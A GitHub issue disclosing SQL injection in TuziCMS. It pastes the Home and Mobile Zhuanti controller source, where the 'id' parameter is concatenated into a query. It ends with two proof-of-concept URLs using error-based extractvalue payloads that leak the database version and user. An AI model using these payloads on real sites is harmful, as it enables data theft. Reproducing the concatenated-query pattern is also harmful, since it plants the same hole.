Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

tuzicms SQLinjection #6

Open
maoqingya opened this issue Sep 17, 2019 · 0 comments
Open

tuzicms SQLinjection #6

maoqingya opened this issue Sep 17, 2019 · 0 comments

Comments

@maoqingya
Copy link

I can't insert image to github~

0x01
App\Home\Controller\ZhuantiController.class.php
`<?php
/*******************************************************************************

  • [TuziCMS] 兔子CMS
  • @copyright (C) 2014-2015 http://tuzicms.com All rights reserved.
  • @Team Yejiao.net
  • @author: 秦大侠 QQ:176881336
  • @Licence http://www.tuzicms.com/license.txt
    *****************************************************************************/
    namespace Home\Controller;
    use Think\Controller;
    use Common\Lib\String; //引入类函数
    use Common\Lib\Category; //引入类函数
    use Common\Lib\Common; //引入类函数
    class ZhuantiController extends CommonController {
    /
    • 专题页面栏目
      */
      public function group(){
      //**字符截取函数
      import('Class.String',APP_PATH);//文件在当前项目目录下的class目录
      $id=I('get.id');//类别ID
      //dump($id);
      //exit;

      //**获取栏目的下级所有子栏目
      import('Class.Category',APP_PATH);//文件在当前项目目录下的class目录
      $m=D('Column')->order('column_sort ASC')->relation(true)->select();
      $m=Category::getChilds($m,$id);//获取id所有的下级栏目的信息

      //二级导航栏目的url,可根据手机站或pc站自动适配url
      $modlu=ACTION ;
      strpos($modlu, "wap");
      if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }else {
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.'wap'.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }
      $this->assign('navlist',$m);
      // var_dump($m);
      // exit;

      //**获取子栏目的上级栏目
      import('Class.Category',APP_PATH);//文件在当前项目目录下的class目录
      $m=D('Column')->order('column_sort ASC')->relation(true)->select();
      $m=Category::getParents($m,$id);//获取nv_id所有的上级栏目的信息

      //全局导航栏目的url,可根据手机站或者pc站石洞适配url
      $modlu=ACTION ;
      strpos($modlu, "wap");
      if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }else {
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.'wap'.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }
      //var_dump($m);
      //exit;
      $this->assign('topnavlist',$m);

      //**全局导航 判断设置最后一个没有尖括号
      $last=count($m)-1;
      $this->assign('last',$last);
      //echo $last;
      //exit;

      //**获取当前栏目的信息
      $topcate=D('Column')->where("id=$id")->order('column_sort')->relation(true)->select();
      $this->assign('nav_list',$topcate);
      //dump($topcate);
      //exit;
      if ($topcate==null){
      $this->error('参数错误');
      }
      $this->assign('blist',$topcate);

      //****SEO信息
      $title=$topcate[0]['column_name'];
      $m=M('Config');
      $data=$m->field('config_webname')->find();
      //dump($data);
      //exit;
      $title=$title.' - '.$data['config_webname'];
      //dump($title);
      //exit;
      $keywords=$topcate[0]['column_keyw'];
      $description=$topcate[0]['column_descr'];
      $this->assign('title',$title);
      $this->assign('keywords',$keywords);
      $this->assign('description',$description);
      //dump($title);
      //exit;

      //**获取所有栏目的信息
      import('Class.Category', APP_PATH);
      $m=D('Column')->order('column_sort')->relation(true)->select();//查询所有栏目的信息
      //dump($m);
      //exit;

      //****查询指定id的栏目下的所有子栏目文章
      foreach ($topcate as $k => $v){
      $cids=Category::getChildsId($m, $v['id']);//传递一个父级分类ID返回所有子分类ID
      $cids[]=$v['id'];//将父级id也压进来赋值给$cids
      //dump($cids);
      //exit;
      $where=array('nv_id'=>array('IN', $cids));//查询新闻表nv_id字段和$cids相等时的数据
      $topcate[$k]['news']=D('News')->where($where)->where("news_dell=0")->relation(true)->select();
      $result=$topcate[$k]['news'];
      //查询新闻表下的所有文章 查询新闻数据赋值给字段news

       //**分页实现代码
       import('ORG.Util.Page');// 导入分页类
       $count=count($result);// 查询满足要求的总记录数
       $Page=new Page($count,5);// 实例化分页类 传入总记录数和每页显示的记录数
       $show=$Page->show();// 分页显示输出
       //**分页实现代码
      
       //查询数据,实现分页
       $where=array('nv_id'=>array('IN', $cids));//查询新闻表nv_id字段和$cids相等时的数据
       
       $m=D('News');
       $field='g.id,g.news_content,g.news_title,g.news_pic,g.news_sort';
       $topcate[$k]['news']=$m->alias('g')->join('LEFT JOIN tuzi_attr i ON i.id = g.news_type')->join('LEFT JOIN tuzi_column c ON c.id = g.nv_id')->field($field)->where($where)->where("news_dell=0")->order('news_sort,id desc')->limit($Page->firstRow.','.$Page->listRows)->select();
       $result=$topcate[$k]['news'];
       //查询新闻表下的所有文章   查询新闻数据赋值给字段news
      

// dump($result);
// exit;
}

	//循环过滤html src标签和截取中文函数  用于摘要简介  substr_ext函数写在commonaction.class.php中
	foreach($result as $k2 => $v2){
		$result[$k2]['news_content'] = $this->substr_ext($v2['news_content'], 0, 160, 'utf-8',"");
	}
	
	foreach($result as $k2 => $v2){
		$result[$k2]['news_title'] = $this->substr_ext($v2['news_title'], 0, 20, 'utf-8',"");
	}
	
	//全局导航栏目的url,可根据手机站或者pc站石洞适配url
	$modlu=__ACTION__ ;
	strpos($modlu, "wap");
	if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
		//文章url
		foreach($result as $k3 => $v3){
			$result[$k3]['url'] = __APP__.'/'.MODULE_NAME.'/'.detail.'/'.'id'.'/'.$v3['id'];
		}
	}else {
		//文章url
		foreach($result as $k3 => $v3){
			$result[$k3]['url'] = __APP__.'/'.'wap'.'/'.MODULE_NAME.'/'.detail.'/'.'id'.'/'.$v3['id'];
		}
	}

// dump($result);
// exit;
//**分页实现代码
$this->assign('page',$show);// 赋值分页输出
//**分页实现代码
$this->assign('vlist',$result);
//dump($topcate);
//dump($result);
//exit;

	$this->display();
}

}`

line 21 and line 78
This is a SQLinjection

EXP:
http://127.0.0.1/tuzicms/index.php/Zhuanti/group?id=1 and (extractvalue(1,concat(0x7e,(select VERSION()),0x7e)))

0x02

App\Mobile\Controller\ZhuantiController.class.php
`<?php
/*******************************************************************************

  • [TuziCMS] 兔子CMS
  • @copyright (C) 2014-2015 http://tuzicms.com All rights reserved.
  • @Team Yejiao.net
  • @author: 秦大侠 QQ:176881336
  • @Licence http://www.tuzicms.com/license.txt
    *****************************************************************************/
    namespace Mobile\Controller;
    use Think\Controller;
    use Common\Lib\String; //引入类函数
    use Common\Lib\Category; //引入类函数
    use Common\Lib\Common; //引入类函数
    class ZhuantiController extends CommonController {
    /
    • 专题页面栏目
      */
      public function group(){
      //**字符截取函数
      import('Class.String',APP_PATH);//文件在当前项目目录下的class目录
      $id=I('get.id');//类别ID
      //dump($id);
      //exit;

      //**获取栏目的下级所有子栏目
      import('Class.Category',APP_PATH);//文件在当前项目目录下的class目录
      $m=D('Column')->order('column_sort ASC')->relation(true)->select();
      $m=Category::getChilds($m,$id);//获取id所有的下级栏目的信息

      //二级导航栏目的url,可根据手机站或pc站自动适配url
      $modlu=ACTION ;
      strpos($modlu, "wap");
      if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }else {
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.'wap'.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }
      $this->assign('navlist',$m);
      // var_dump($m);
      // exit;

      //**获取子栏目的上级栏目
      import('Class.Category',APP_PATH);//文件在当前项目目录下的class目录
      $m=D('Column')->order('column_sort ASC')->relation(true)->select();
      $m=Category::getParents($m,$id);//获取nv_id所有的上级栏目的信息

      //全局导航栏目的url,可根据手机站或者pc站石洞适配url
      $modlu=ACTION ;
      strpos($modlu, "wap");
      if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }else {
      //栏目url
      foreach($m as $k3 => $v3){
      $m[$k3]['url'] = APP.'/'.'wap'.'/'.$v3['url'].'/'.group.'/'.'id'.'/'.$v3['id'];
      }
      }
      //var_dump($m);
      //exit;
      $this->assign('topnavlist',$m);

      //**全局导航 判断设置最后一个没有尖括号
      $last=count($m)-1;
      $this->assign('last',$last);
      //echo $last;
      //exit;

      //**获取当前栏目的信息
      $topcate=D('Column')->where("id=$id")->order('column_sort')->relation(true)->select();
      $this->assign('nav_list',$topcate);
      //dump($topcate);
      //exit;
      if ($topcate==null){
      $this->error('参数错误');
      }
      $this->assign('blist',$topcate);

      //****SEO信息
      $title=$topcate[0]['column_name'];
      $m=M('Config');
      $data=$m->field('config_webname')->find();
      //dump($data);
      //exit;
      $title=$title.' - '.$data['config_webname'];
      //dump($title);
      //exit;
      $keywords=$topcate[0]['column_keyw'];
      $description=$topcate[0]['column_descr'];
      $this->assign('title',$title);
      $this->assign('keywords',$keywords);
      $this->assign('description',$description);
      //dump($title);
      //exit;

      //**获取所有栏目的信息
      import('Class.Category', APP_PATH);
      $m=D('Column')->order('column_sort')->relation(true)->select();//查询所有栏目的信息
      //dump($m);
      //exit;

      //****查询指定id的栏目下的所有子栏目文章
      foreach ($topcate as $k => $v){
      $cids=Category::getChildsId($m, $v['id']);//传递一个父级分类ID返回所有子分类ID
      $cids[]=$v['id'];//将父级id也压进来赋值给$cids
      //dump($cids);
      //exit;
      $where=array('nv_id'=>array('IN', $cids));//查询新闻表nv_id字段和$cids相等时的数据
      $topcate[$k]['news']=D('News')->where($where)->where("news_dell=0")->relation(true)->select();
      $result=$topcate[$k]['news'];
      //查询新闻表下的所有文章 查询新闻数据赋值给字段news

       //**分页实现代码
       import('ORG.Util.Page');// 导入分页类
       $count=count($result);// 查询满足要求的总记录数
       $Page=new Page($count,5);// 实例化分页类 传入总记录数和每页显示的记录数
       $show=$Page->show();// 分页显示输出
       //**分页实现代码
      
       //查询数据,实现分页
       $where=array('nv_id'=>array('IN', $cids));//查询新闻表nv_id字段和$cids相等时的数据
       
       $m=D('News');
       $field='g.id,g.news_content,g.news_title,g.news_pic,g.news_sort';
       $topcate[$k]['news']=$m->alias('g')->join('LEFT JOIN tuzi_attr i ON i.id = g.news_type')->join('LEFT JOIN tuzi_column c ON c.id = g.nv_id')->field($field)->where($where)->where("news_dell=0")->order('news_sort,id desc')->limit($Page->firstRow.','.$Page->listRows)->select();
       $result=$topcate[$k]['news'];
       //查询新闻表下的所有文章   查询新闻数据赋值给字段news
      

// dump($result);
// exit;
}

	//循环过滤html src标签和截取中文函数  用于摘要简介  substr_ext函数写在commonaction.class.php中
	foreach($result as $k2 => $v2){
		$result[$k2]['news_content'] = $this->substr_ext($v2['news_content'], 0, 160, 'utf-8',"");
	}
	
	foreach($result as $k2 => $v2){
		$result[$k2]['news_title'] = $this->substr_ext($v2['news_title'], 0, 20, 'utf-8',"");
	}
	
	//全局导航栏目的url,可根据手机站或者pc站石洞适配url
	$modlu=__ACTION__ ;
	strpos($modlu, "wap");
	if (strpos($modlu, "wap")==''){//如果url中不存在wap(不区分大小写)
		//文章url
		foreach($result as $k3 => $v3){
			$result[$k3]['url'] = __APP__.'/'.MODULE_NAME.'/'.detail.'/'.'id'.'/'.$v3['id'];
		}
	}else {
		//文章url
		foreach($result as $k3 => $v3){
			$result[$k3]['url'] = __APP__.'/'.'wap'.'/'.MODULE_NAME.'/'.detail.'/'.'id'.'/'.$v3['id'];
		}
	}

// dump($result);
// exit;
//**分页实现代码
$this->assign('page',$show);// 赋值分页输出
//**分页实现代码
$this->assign('vlist',$result);
//dump($topcate);
//dump($result);
//exit;

	$this->display();
}

}`

line 21 and line 78 is a SQLinjection

EXP:
http://127.0.0.1/tuzicms/index.php/Mobile/Zhuanti/group?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant